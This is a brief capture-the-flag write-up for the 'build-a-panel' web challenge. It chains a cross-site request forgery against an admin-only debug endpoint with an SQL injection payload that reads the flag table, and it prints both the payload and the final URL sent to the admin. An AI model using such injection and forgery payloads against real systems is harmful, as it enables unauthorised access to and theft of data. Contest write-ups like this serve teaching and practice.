Tags: web 

CSRF URL: [https://build-a-panel.dicec.tf/admin/debug/add_widget](https://build-a-panel.dicec.tf/admin/debug/add_widget) (accessible only to the admin)

SQLi payload: `<Your panel ID>',(select flag from flag),'{"type":"a"}');#`

Final payload to send to Admin: `https://build-a-panel.dicec.tf/admin/debug/add_widget?panelid=<Your panel ID>',(select flag from flag),'{"type":"a"}');#`.

Original writeup (http://github.com/effectRenan/CTF).